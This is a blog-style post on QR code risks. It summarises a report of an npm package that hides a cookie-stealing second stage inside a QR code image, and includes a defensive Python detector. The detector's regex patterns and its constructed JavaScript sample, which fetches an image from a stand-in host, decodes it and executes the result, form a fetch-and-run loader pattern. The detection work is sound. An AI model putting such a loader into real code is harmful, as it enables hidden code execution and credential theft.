I love it when people come up to me and say they are “wicked paranoid” about QR codes. I have been trying to educate people on the risks of QR codes for years and that gives me satisfaction that I have prevented that person from becoming a victim of a malicious QR code. QR codes have become ubiquitous since the pandemic, starting with menuless menus. I ask for a paper menu, and surprisingly, most restaurants still have them.

Here’s another example to bolster my case. Bleeping Computer reported that the Socket Threat Research Team has identified “a malicious package, ‘fezbox’, published to npmjs.com, the world’s largest open-source registry for JavaScript and Node.js developers… which contains hidden instructions to fetch a JPG image containing a QR code, which it can then further process to run a second-stage obfuscated payload as a part of the attack.” What does this mean? Once the QR code is decoded, the payload it carries reads the browser’s cookies with document.cookie. If there is a username and password in the stolen cookie, the attacker can lift that information directly from the victim. The threat actor then has the victim’s credentials to access the victim’s data, including sensitive and proprietary data.
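As an added illustration of the defender’s side (this is not fezbox, Socket’s tooling, or any code from the report), the following Python heuristic flags JavaScript source that combines the loader’s stages: fetching an image, decoding a QR code, and executing the decoded text. The QR library names and the two sample snippets are constructed assumptions, not identifiers taken from the actual package.

```python
"""Heuristic static check for an image-to-QR-to-code loader in JavaScript.

Added example only. Each stage is a list of regexes; a file that matches the
three loader stages is flagged. The QR library hints are assumptions about
what such a package might import, not the names fezbox actually used.
"""
import re

STAGES = {
    # Stage 1: pull an image file over HTTP (looks like ordinary image traffic)
    "image_fetch": [r"fetch\([^)]*\.(?:jpe?g|png|gif)",
                    r"https?://[^\s'\"]+\.(?:jpe?g|png|gif)"],
    # Stage 2: decode a QR code from pixel data (library names are assumptions)
    "qr_decode": [r"\bjsQR\b", r"require\(['\"]qrcode", r"\bqr[-_]?code\b"],
    # Stage 3: run text as code, i.e. the decoded second stage
    "dynamic_exec": [r"\beval\(", r"new Function\("],
    # Reported separately: in the case described above, document.cookie lives
    # in the decoded second stage, so its absence in the package is no comfort.
    "cookie_access": [r"document\.cookie"],
}


def score_source(js: str) -> dict:
    """Return, per stage, whether any of its patterns occur in the source."""
    return {stage: any(re.search(p, js, re.IGNORECASE) for p in pats)
            for stage, pats in STAGES.items()}


def is_suspicious(js: str) -> bool:
    """Flag the loader pattern: fetch image -> decode QR -> execute its text."""
    hits = score_source(js)
    return hits["image_fetch"] and hits["qr_decode"] and hits["dynamic_exec"]


# Constructed samples (not real package code).
SUSPICIOUS_SAMPLE = """
const res = await fetch("https://cdn.example.invalid/banner.jpg");
const code = jsQR(pixels, width, height);
new Function(code.data)();
"""

BENIGN_SAMPLE = """
import jsQR from "jsqr";
export function readTicket(pixels, w, h) { return jsQR(pixels, w, h)?.data; }
"""

if __name__ == "__main__":
    for name, src in [("suspicious", SUSPICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)]:
        print(name, is_suspicious(src), score_source(src))
```

Obfuscated packages can split or encode these strings, so treat a miss as inconclusive and a hit as a reason to read the package by hand.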

According to Bleeping Computer, “we have seen countless cases of QR codes deployed in social engineering scams…but these require human intervention…scanning the code and being led to a phishing website, for example…but this week’s discovery by Socket shows yet another twist on QR codes: a compromised machine can use them to talk to its command-and-control (C2) server in a way that, to a proxy or network security tool, may look like nothing more than ordinary image traffic.” Because the threats posed by malicious QR codes are not yet well known, I anticipate that threat actors will continue to find ways to embed malicious code in them for various goals, including phishing, smishing, and credential theft, and it will be hard to get out in front of the risk. One way to mitigate the risk is to never scan a public QR code, never click on a QR code in an email, and be wicked paranoid about any QR code presented to you.